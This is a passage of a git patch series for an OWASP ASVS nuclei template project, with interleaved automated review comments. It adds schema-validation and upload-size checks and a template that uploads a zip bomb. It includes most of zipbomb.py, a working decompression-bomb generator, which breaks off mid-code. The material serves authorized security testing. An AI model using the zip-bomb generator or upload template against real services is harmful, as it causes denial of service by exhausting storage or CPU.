+0330 Subject: [PATCH 067/129] Create 13.3.1.yaml Signed-off-by: Hamed Salimian --- templates/13.3.1.yaml | 52 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 templates/13.3.1.yaml diff --git a/templates/13.3.1.yaml b/templates/13.3.1.yaml new file mode 100644 index 0000000..8969e5c --- /dev/null +++ b/templates/13.3.1.yaml 
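Review bot: in the templates/headless/14.2.3.yaml change, `matchingTagsAsString.join('|')` uses a character that can legitimately appear inside a serialized tag (for example in a query string of `src`), which would split one element into several fragments; a newline or another character that cannot appear in serialized HTML attributes is a safer separator. The new extractor `trim(split(assets_with_external_fqdn, '|'), '[]')` also depends on the string form of the slice returned by `split` (the surrounding `[` and `]` it strips), which is not a documented output contract; keeping the `kval` extractor for the raw joined string and applying `split` only in the matcher avoids that dependency.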
@@ -0,0 +1,52 @@ +id: ASVS-4-0-3-V13-3-1 + +info: + name: ASVS 13.3.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-20 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_13_3_1/index.html + tags: asvs,13.3.1 + description: | + Verify that XSD schema validation takes place to ensure a properly formed XML document, followed by validation of each input field before any processing of that data takes place. + +variables: + valid_xml: JohnJohn.Doe@mail.com + invalid_xml: JohnJohn.Doe + +http: + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/xml" + body: "{{valid_xml}}" + + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/xml" + body: "{{invalid_xml}}" + + extractors: + - type: dsl + name: "Valid xml submission status code" + dsl: + - http_1_status_code + + - type: dsl + name: "Invalid xml submission status code" + dsl: + - http_2_status_code + + matchers: + - type: dsl + name: "XSD schema validation does not take place" + dsl: + - http_1_status_code == http_2_status_code From c5473f852f489cd3a480c5f80d1409685f80bc63 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:12:01 +0330 Subject: [PATCH 068/129] Update 13.3.1.yaml Signed-off-by: Hamed Salimian --- templates/13.3.1.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/13.3.1.yaml b/templates/13.3.1.yaml index 8969e5c..58463c4 100644 --- a/templates/13.3.1.yaml +++ b/templates/13.3.1.yaml @@ -25,7 +25,7 @@ http: Host: "{{Hostname}}" Content-type: "application/xml" body: "{{valid_xml}}" - + - method: POST path: - "{{BaseURL}}" @@ -39,7 +39,7 @@ http: name: "Valid xml submission status code" dsl: - http_1_status_code - + - type: dsl name: "Invalid xml submission status code" dsl: 
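Review bot: the matcher `http_1_status_code == http_2_status_code` in templates/13.3.1.yaml reports "XSD schema validation does not take place" whenever both POSTs get the same status, including when the endpoint rejects both (404/405 on `{{BaseURL}}`, 415 for an endpoint that does not accept XML at all), which is a false positive. Guard the conclusion on the valid document having been accepted, e.g. `http_1_status_code >= 200 && http_1_status_code < 300 && http_1_status_code == http_2_status_code`, and note in the description that the check is only meaningful against an endpoint that consumes the posted XML.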
From 211407397be65ed653c0a6db3db3ccaf4455e468 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:16:53 +0330 Subject: [PATCH 069/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 2656ccd..b12b53f 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -11,7 +11,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 @@ -21,9 +21,10 @@ jobs: go-version: 1.20.x - name: nuclei install - run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest + run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest - name: Template Validation run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -w ./templates/workflows -allow-local-file-access From 6ddf44c8d5155778b6e2cf243234b36226db437c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:23:39 +0330 Subject: [PATCH 070/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index b12b53f..806221e 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -18,7 +18,7 @@ jobs: - name: Set up Go uses: actions/setup-go@v4 with: - go-version: 1.20.x + go-version: 1.21.x - name: nuclei install run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest 
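Review bot: `go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest` in .github/workflows/template-validate.yml pins nothing, so the validation result can change whenever a new nuclei release lands; pin a tag (or at least a minor version) so failures are attributable to this repo's changes. The Go bump to `1.21.x` in the following commit is required by the nuclei v3 module and belongs in the same commit as the v2-to-v3 switch rather than a separate "Update template-validate.yml".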
@@ -27,4 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w ./templates/workflows -allow-local-file-access + nuclei -duc -validate -w nuclei-templates/workflows -allow-local-file-access From 038c711e95bf2aeb6af65132d5830340c1150aef Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:26:15 +0330 Subject: [PATCH 071/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 806221e..946c11b 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w nuclei-templates/workflows -allow-local-file-access + nuclei -duc -validate -w ./workflows -allow-local-file-access From 58f0e243533425764cb2e52d8f7dc093675274d1 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Dec 2023 08:35:55 +0330 Subject: [PATCH 072/129] Create 13.2.2.yaml Signed-off-by: Hamed Salimian --- templates/13.2.2.yaml | 51 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 templates/13.2.2.yaml diff --git a/templates/13.2.2.yaml b/templates/13.2.2.yaml new file mode 100644 index 0000000..f095523 --- /dev/null +++ b/templates/13.2.2.yaml 
@@ -0,0 +1,51 @@ +id: ASVS-4-0-3-V13-2-2 + +info: + name: ASVS 13.2.2 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-20 + reference: + - https://snbig.github.io/Vulnerable-Pages/ASVS_13_2_2/index.html + tags: asvs,13.2.2 + description: | + Verify that JSON schema validation is in place and verified before accepting input. + +variables: + valid_json: '{"name":"John Doe","age":20}' + invalid_json: '{"name":"John Doe","age":200}' + +http: + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/json" + body: "{{valid_json}}" + + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/json" + body: "{{invalid_json}}" + + extractors: + - type: dsl + name: "Valid json submission status code" + dsl: + - http_1_status_code + + - type: dsl + name: "Invalid json submission status code" + dsl: + - http_2_status_code + + matchers: + - type: dsl + name: "JSON schema validation does not take place" + dsl: + - http_1_status_code == http_2_status_code From 01d7301930cad42eb173984ee0aee05741f2472b Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Dec 2023 08:38:55 +0330 Subject: [PATCH 073/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 946c11b..3caedc5 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,3 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w ./workflows -allow-local-file-access From e8010a19e2a77ce370b58fd9ba53eff701b0f2b8 Mon Sep 17 00:00:00 2001 
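Review bot: the `valid_json` / `invalid_json` values in templates/13.2.2.yaml (`{"name":"John Doe","age":20}` vs `age":200`) encode the schema of the project's own Vulnerable-Pages demo; against any other target the field names and the assumption that `age` is bounded will not hold, and the template will silently compare two unrelated rejections. Document that these variables must be overridden per target (nuclei's `-var key=value` flag) and, as with the XSD template, require `http_1_status_code` to be 2xx before concluding "JSON schema validation does not take place".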
From: Hamed Salimian Date: Tue, 12 Dec 2023 05:16:48 +0000 Subject: [PATCH 074/129] Update submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index fe1dced..266f974 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit fe1dced06e1e47a9985477251a8f02914d901031 +Subproject commit 266f9741658e1da4ac76d42e5121f0721063070c From a703bb14e2ffcc67bd29a8778145252d7f657be7 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 9 Feb 2024 11:08:05 +0330 Subject: [PATCH 075/129] Fix reference of 9.1.3.yaml Signed-off-by: Hamed Salimian --- templates/9.1.3.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index fd5bf0e..325c9f2 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -5,7 +5,7 @@ info: author: righettod,forgedhallpass,RezaSaeedi severity: low reference: - - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security - https://wiki.mozilla.org/Security/Server_Side_TLS - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html - https://ssl-config.mozilla.org/#config=intermediate From 57485bde2b510602ab08ddbfddbbebe33e903c9d Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:58:17 +0330 Subject: [PATCH 076/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 3caedc5..4adac39 100644 --- a/.github/workflows/template-validate.yml 
+++ b/.github/workflows/template-validate.yml @@ -27,3 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows \ No newline at end of file From adb6278a0370e3861a0d1994b7635ac0fb02449a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 12:06:34 +0330 Subject: [PATCH 077/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 4adac39..213dda0 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows \ No newline at end of file + nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows From 700fe9f1a226c475e0d3757ef89e8b2228705738 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 20 Aug 2023 11:00:16 +0330 Subject: [PATCH 078/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index 633a668..f27869b 100644 --- a/tab_contributing.md +++ b/tab_contributing.md @@ -14,4 +14,4 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: -- [Hamed Salimain](https://github.com/Snbig) (Project Leader) +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) \ No newline at end of file 
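Review bot: across these commits the workflow-validation line in .github/workflows/template-validate.yml is added as `-w ./templates/workflows`, rewritten to `-w nuclei-templates/workflows`, then `-w ./workflows`, removed, and finally re-added as `-w /home/runner/nuclei-templates/workflows` (once without and once with a trailing newline). Squash these into one change and add a comment explaining that `-w` must point inside the copied template directory because workflow entries reference templates relative to nuclei's template root; that prevents the next contributor from repeating the cycle. Note also that the two re-adding commits are dated Aug 2023 while the removal is dated Dec 2023, so the series only yields the intended end state if applied in this exact order.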
From 56a9545e62c046310527b71b0b25208ab8e163c4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 4 Sep 2023 07:15:15 +0330 Subject: [PATCH 079/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index f27869b..633a668 100644 --- a/tab_contributing.md +++ b/tab_contributing.md @@ -14,4 +14,4 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: -- [Hamed Salimain](https://github.com/Snbig) (Project Leader) \ No newline at end of file +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) From fecf53fbbbdfd8fec30adb2bc93772e065ae299b Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 14 Oct 2023 11:52:48 +0330 Subject: [PATCH 080/129] Update README.md Signed-off-by: Hamed Salimian From 0dda23035aed7f8752bbfba6e489fa5e0009713f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 12:42:15 +0000 Subject: [PATCH 081/129] Create 12.1.1.(2).yaml --- templates/12.1.1.yaml | 64 +++ templates/code/12.1.1.2.yaml | 59 +++ templates/code/source/zipbomb.py | 768 +++++++++++++++++++++++++++++++ 3 files changed, 891 insertions(+) create mode 100644 templates/12.1.1.yaml create mode 100644 templates/code/12.1.1.2.yaml create mode 100644 templates/code/source/zipbomb.py diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml new file mode 100644 index 0000000..fc2fe45 --- /dev/null +++ b/templates/12.1.1.yaml 
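Review bot: commits 078 and 079 only remove and then restore the trailing newline of tab_contributing.md, and commit 080 ("Update README.md") carries no diff at all, so the three are a net no-op and should be dropped from the series before merge.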
@@ -0,0 +1,64 @@ +id: ASVS-4-0-3-V12-1-1 + +info: + name: ASVS 12.1.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + + +variables: + large_file_size: 10000000 + small_file_size: 100 + file_type: "text/plain" + file_ext: "txt" + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{small_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{large_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + extractors: + - type: dsl + name: status code of large file upload. + dsl: + - status_code_2 + + matchers: + - type: dsl + name: status_code + condition: and + dsl: + - status_code_2 < 210 && status_code_2 >= 200 + - status_code_2 == status_code \ No newline at end of file diff --git a/templates/code/12.1.1.2.yaml b/templates/code/12.1.1.2.yaml new file mode 100644 index 0000000..98fa6a8 --- /dev/null 
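Review bot: in templates/12.1.1.yaml the second matcher condition `status_code_2 == status_code` compares the large-upload response with an un-indexed `status_code`; if the intent is to check that the large file was handled the same way as the small baseline upload, that should be the explicit `status_code_1`, otherwise the condition is ambiguous about which response it refers to. The reference list also carries the WSTG HTTP-methods page (`06-Test_HTTP_Methods`), which looks copied from 14.5.1 and has nothing to do with upload size limits; the File Upload Cheat Sheet entry is the relevant one. Style: the extractor name "status code of large file upload." and the matcher name `status_code` do not follow the naming used elsewhere, and the file lacks a trailing newline.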
+++ b/templates/code/12.1.1.2.yaml @@ -0,0 +1,59 @@ +id: ASVS-4-0-3-V12-1-1-2 + +info: + name: ASVS 12.1.1.2 (Zipbomb) Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://github.com/ZerosunGitHub/zipbomb + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + +variables: + mode: "quoted_overlap" + num-files: 250 + compressed-size: 21179 + +code: + - engine: + - py + - python + - python3 + source: | + import subprocess + import sys + import os + + mode = os.getenv('mode') + num_files = os.getenv('num-files') + compressed_size = os.getenv('compressed-size') + subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="zipbomb.zip" + Content-Type: application/zip + + {{code_response}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + matchers: + - type: status + name: status_code + status: + - 500 + - 503 +# digest: 4b0a00483046022100c965e8aa990ee25114f7e6ee8d12409719404e286ff49c879f842302a18eda14022100a35665298c4e11bdca2517f18b667064a19dfa3657a292f5fd58fb92a594b1b9:99354b7c2d97285abe7401b783fba350 \ No newline at end of file diff --git a/templates/code/source/zipbomb.py b/templates/code/source/zipbomb.py new file mode 100644 index 0000000..70a3525 
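Review bot: templates/code/12.1.1.2.yaml invokes `code/source/zipbomb.py` through a path relative to the process working directory, so it only works when nuclei is started from the `templates/` directory; resolve the path relative to the template file or document the required cwd. The variables `num-files` and `compressed-size` are read back with `os.getenv('num-files')` / `os.getenv('compressed-size')`; hyphenated environment variable names are not portable across shells and engines, so rename them with underscores. Because this template uploads a decompression bomb that can exhaust the target's storage or CPU, tag it `dos` so it is excluded unless run deliberately, and state in the description that a 2xx here is inconclusive (a server that stores the file and expands it later will not return the 500/503 the matcher looks for). The appended `# digest:` line is a signing artifact that will be invalidated by any edit to the file; either sign all templates consistently or leave it out.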
--- /dev/null +++ b/templates/code/source/zipbomb.py 
@@ -0,0 +1,768 @@ +#!/usr/bin/env python3 + +import binascii +import bz2 +import getopt +import math +import struct +import sys +import zipfile + + +CHOSEN_BYTE = ord(b"a") # homage to 42.zip + + +# CRC-32 precomputation using matrices in GF(2). Similar to crc32_combine in +# zlib. See https://stackoverflow.com/a/23126768 for a description of the idea. +# Here, we use a 33-bit state where the dummy 33rd coordinate is always 1 +# (similar to homogeneous coordinates). Matrices are represented as 33-element +# lists, where each element is a 33-bit integer representing one column. + +CRC_POLY = 0xedb88320 + +def matrix_mul_vector(m, v): + r = 0 + for shift in range(len(m)): + if (v>>shift) & 1 == 1: + r ^= m[shift] + return r + +def matrix_mul(a, b): + assert len(a) == len(b) + return [matrix_mul_vector(a, v) for v in b] + +def identity_matrix(): + return [1<>shift)&1], m) + return m + +def precompute_crc_matrix_repeated(data, n): + accum = precompute_crc_matrix(data) + # Square-and-multiply algorithm to compute m = accum^n. + m = identity_matrix() + while n > 0: + if n & 1 == 1: + m = matrix_mul(m, accum) + accum = matrix_mul(accum, accum) + n >>= 1 + return m + +def crc_matrix_apply(m, value=0): + return (matrix_mul_vector(m, (value^0xffffffff)|(1<<32)) & 0xffffffff) ^ 0xffffffff + + +# DEFLATE stuff, see RFC 1951. + +class BitBuffer: + def __init__(self): + self.done = [] + self.current = 0 + self.bit_pos = 0 + + def push(self, x, n): + assert x == x % (1<= (8 - self.bit_pos): + self.current |= (x << self.bit_pos) & 0xff + x >>= (8 - self.bit_pos) + n -= (8 - self.bit_pos) + self.done.append(self.current) + self.current = 0 + self.bit_pos = 0 + self.current |= (x << self.bit_pos) & 0xff + self.bit_pos += n + + def push_rev(self, x, n): + mask = (1<>1 + while mask > 0: + self.push(x&mask != 0 and 1 or 0, 1) + mask >>= 1 + + def bytes(self): + out = bytes(self.done) + if self.bit_pos != 0: + out += bytes([self.current]) + return out + +# RFC 1951 section 3.2.2. 
Input is a sym: length dict and output is a +# sym: (code, length) dict. +def huffman_codes_from_lengths(sym_lengths): + bl_count = {} + max_length = 0 + for _, length in sym_lengths.items(): + bl_count.setdefault(length, 0) + bl_count[length] += 1 + max_length = max(max_length, length) + + next_code = {} + code = 0 + for length in range(max_length): + code = (code + bl_count.get(length, 0)) << 1 + next_code[length+1] = code + + result = {} + for sym, length in sorted(sym_lengths.items(), key=lambda x: (x[1], x[0])): + assert next_code[length] >> length == 0, (sym, bin(next_code[length]), length) + result[sym] = next_code[length], length + next_code[length] += 1 + return result + +def print_huffman_codes(sym_codes, **kwargs): + max_sym_length = max(len("{}".format(sym)) for sym in sym_codes) + for sym, code in sorted(sym_codes.items()): + code, length = code + print("{:{}}: {:0{}b}".format(sym, max_sym_length, code, length), **kwargs) + +# RFC 1951 section 3.2.5. Returns a tuple (code, extra_bits, num_extra_bits). +def code_for_length(length): + if length < 3: + return None, None, None + elif length < 11: + base_code, base_length, num_bits = 257, 3, 0 + elif length < 19: + base_code, base_length, num_bits = 265, 11, 1 + elif length < 35: + base_code, base_length, num_bits = 269, 19, 2 + elif length < 67: + base_code, base_length, num_bits = 273, 35, 3 + elif length < 131: + base_code, base_length, num_bits = 277, 67, 4 + elif length < 258: + base_code, base_length, num_bits = 281, 131, 5 + else: + raise ValueError(length) + return base_code + ((length - base_length) >> num_bits), (length - base_length) & ((1<= 11: + if n < 138: + x = n + elif n < 138 + 11 and code_length_lengths[18] < (n - 138) * code_length_lengths[0]: + # It'll be cheaper to cut this 18 block short and do the + # remainder with another full 18 block. 
+ x = n - 11 + else: + x = 138 + bits.push_rev(*code_length_codes[18]) # 7 bits of length to follow + bits.push(x - 11, 7) + n -= x + while n > 0: + bits.push_rev(*code_length_codes[0]) + n -= 1 + # Output a Huffman tree in terms of code lengths. + def output_code_length_tree(sym_lengths): + cur = 0 + for sym, length in sorted(sym_lengths.items()): + skip(sym - cur) + bits.push_rev(*code_length_codes[length]) + cur = sym + 1 + + # Output Huffman tree for literal/length values. + output_code_length_tree(ll_lengths) + + # Output Huffman tree for distance codes. + output_code_length_tree(distance_lengths) + + n = 0 + # A literal byte to start the whole process. + bits.push_rev(*ll_codes[repeated_byte]) + n += 1 + + # Now every pair of 0 bits encodes 258 copies of repeated_byte. + is_even = bits.bit_pos % 2 == 0 + # Including whatever zero bits remain at the end of the bit buffer. + n += (8 - bits.bit_pos + 1) // 2 * 258 + + prefix = bits.bytes() + + bits = BitBuffer() + if not is_even: + bits.push(*distance_codes[0]) + if max_uncompressed_size is not None: + # Push bytes to get within 258 of the max we are allowed. + while (max_uncompressed_size - n) % 1032 >= 258: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + else: + # Push the stream-end code (256) as far back in the byte as possible. 
+ while bits.bit_pos + ll_lengths[285] + distance_lengths[0] + ll_lengths[256] <= 8: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + bits.push_rev(*ll_codes[256]) + suffix = bits.bytes() + + if max_uncompressed_size is not None: + num_zeroes = (max_uncompressed_size - n) // 1032 + else: + num_zeroes = compressed_size - len(prefix) - len(suffix) + + n += num_zeroes * 1032 + body = b"\x00" * num_zeroes + + compressed_data = prefix + body + suffix + + if max_uncompressed_size is not None: + assert (max_uncompressed_size - n) < 258, (n, max_uncompressed_size) + else: + assert len(compressed_data) == compressed_size, (len(compressed_data), compressed_size) + + return compressed_data, n, precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + + +# bzip2 stuff + +def bulk_bzip2(repeated_byte, compressed_size=None, max_uncompressed_size=None): + assert (compressed_size is None and max_uncompressed_size is not None) or (compressed_size is not None and max_uncompressed_size is None) + + # 45899235, empirically determined to be the largest amount of data that + # fits into a 900 kB block after the initial bzip2 RLE (each 255 bytes + # becomes 5 bytes; 45899235 * 5 / 255 = 899985). + # https://en.wikipedia.org/w/index.php?title=Bzip2&oldid=890453143#File_format + # says it can fit 45899236, 1 byte more, but in my tests that results in a + # second block being emitted. + block_uncompressed_size = 45899235 + + # Use an actual bzip2 implementation to compress the entire stream, then + # extract from it a single block that we will repeat. This is actually + # bogus, because whatever follows the block header is not necessarily + # byte-aligned, but the assertions will prevent going ahead if things don't + # work out perfectly. 
+ basic = bz2.compress(bytes([repeated_byte])*block_uncompressed_size, 9) + assert len(basic) == 46, basic + header, block, footer, _ = basic[0:4], basic[4:36], basic[36:42], basic[42:] + assert header == b"BZh9", header + assert block.startswith(b"\x31\x41\x59\x26\x53\x59"), block + assert footer == b"\x17\x72\x45\x38\x50\x90", header + block_crc, = struct.unpack(">L", block[6:10]) + + if compressed_size is not None: + num_blocks = (compressed_size - 4 - 10) // 32 + assert (compressed_size - 4 - 10) % 32 == 0 + else: + num_blocks = max_uncompressed_size // block_uncompressed_size + n = num_blocks * block_uncompressed_size + # 2.2.4 https://github.com/dsnet/compress/blob/master/doc/bzip2-format.pdf + stream_crc = 0 + for i in range(num_blocks): + stream_crc = (block_crc ^ ((stream_crc<<1) | (stream_crc>>31))) & 0xffffffff + + crc_matrix = precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + compressed_data = header + block*num_blocks + footer + struct.pack(">L", stream_crc) + return compressed_data, n, crc_matrix + + +# APPNOTE.TXT 4.4.5 +# 8 - The file is Deflated +COMPRESSION_METHOD_DEFLATE = 8 +# 12 - File is compressed using BZIP2 algorithm +COMPRESSION_METHOD_BZIP2 = 12 + +BULK_COMPRESS = { + COMPRESSION_METHOD_BZIP2: bulk_bzip2, + COMPRESSION_METHOD_DEFLATE: bulk_deflate, +} + +# APPNOTE.TXT 4.4.3.2 +# 2.0 - File is compressed using Deflate compression +ZIP_VERSION = 20 +# 4.5 - File uses ZIP64 format extensions +ZIP64_VERSION = 45 +# 4.6 - File is compressed using BZIP2 compression +ZIP_BZIP2_VERSION = 46 + +MOD_DATE = 0x0548 +MOD_TIME = 0x6ca0 + +def zip_version(compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False): + candidates = [ZIP_VERSION] + if compression_method==COMPRESSION_METHOD_BZIP2: + candidates.append(ZIP_BZIP2_VERSION) + if zip64: + candidates.append(ZIP64_VERSION) + return max(candidates) + +# In Zip64 mode, we add a Zip64 extra field for every file (including using +# ZIP64_VERSION instead of ZIP_VERSION) for *every* file, 
whether it is large +# enough to need it or not. Past a certain threshold, every file *does* need it +# anyway. It may be slightly better for compatibility to write every file in +# either Zip64 or non-Zip64 mode. See the block comment in putextended in +# zipfile.c of Info-ZIP Zip 3.0 (though the worst incompatibility has to do with +# data descriptors, which we don't use). +# +# Even in Zip64 mode, we make the assumption that the only field that needs to +# be represented in the Zip64 extra info is uncompressed_size, and not +# compressed_size nor local_file_header_offset (checked with an assertion in +# CentralDirectoryHeader.serialize). This is to make analysis easier (central +# directory headers and local file headers continue to have a fixed size), and +# because the zip file has to be really big for either of those fields to exceed +# 4 GiB—the quoted_overlap method can produce a zip file whose total unzipped +# size is greater than 16 EiB (2^64 bytes) without exceeding either of those +# limits. + +class LocalFileHeader: + def __init__(self, compressed_size, uncompressed_size, crc, filename, compression_method=COMPRESSION_METHOD_DEFLATE, extra_tag=None, extra_length_excess=0): + self.compressed_size = compressed_size + self.uncompressed_size = uncompressed_size + self.crc = crc + self.filename = filename + self.compression_method = compression_method + self.extra_tag = extra_tag + self.extra_length_excess = extra_length_excess + + def serialize(self, zip64=False): + # APPNOTE.TXT 4.5.3 says that in the local file header, unlike the + # central directory header, we must include both uncompressed_size and + # compressed_size in the Zip64 extra field, even if one of them is not + # so big as to require Zip64. + extra = b"" + if zip64: + extra += 